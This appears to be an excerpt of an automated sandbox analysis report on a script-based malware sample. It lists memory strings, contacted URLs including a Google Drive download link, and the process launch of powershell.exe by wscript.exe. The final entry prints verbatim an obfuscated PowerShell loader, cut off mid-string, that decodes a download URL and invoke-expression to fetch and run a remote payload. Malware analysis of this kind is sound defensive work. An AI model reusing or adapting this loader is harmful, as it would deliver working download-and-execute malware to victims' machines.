Source: |
Binary string: ion.pdbj source: powershell.exe, 00000002.00000002.2136067379.000002B82A53B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2178700348.000002B842AC9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Microsoft\CLR_v4.0n.pdb source: powershell.exe, 00000002.00000002.2135929745.000002B82A4C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 00000002.00000002.2136067379.000002B82A54E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Target.pdbERSPROF] source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp |
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab= |
Source: wscript.exe, 00000000.00000003.2013570328.000001B413981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013924084.000001B4139A8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d6441c |
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe |
Source: wscript.exe, 00000000.00000003.2023391085.000001B4117C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2024986575.000001B411828000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021652412.000001B4117B5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ens |
Source: wscript.exe, 00000000.00000003.2013924084.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013570328.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d64 |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C43D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0P |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.comP |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82B932000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,s |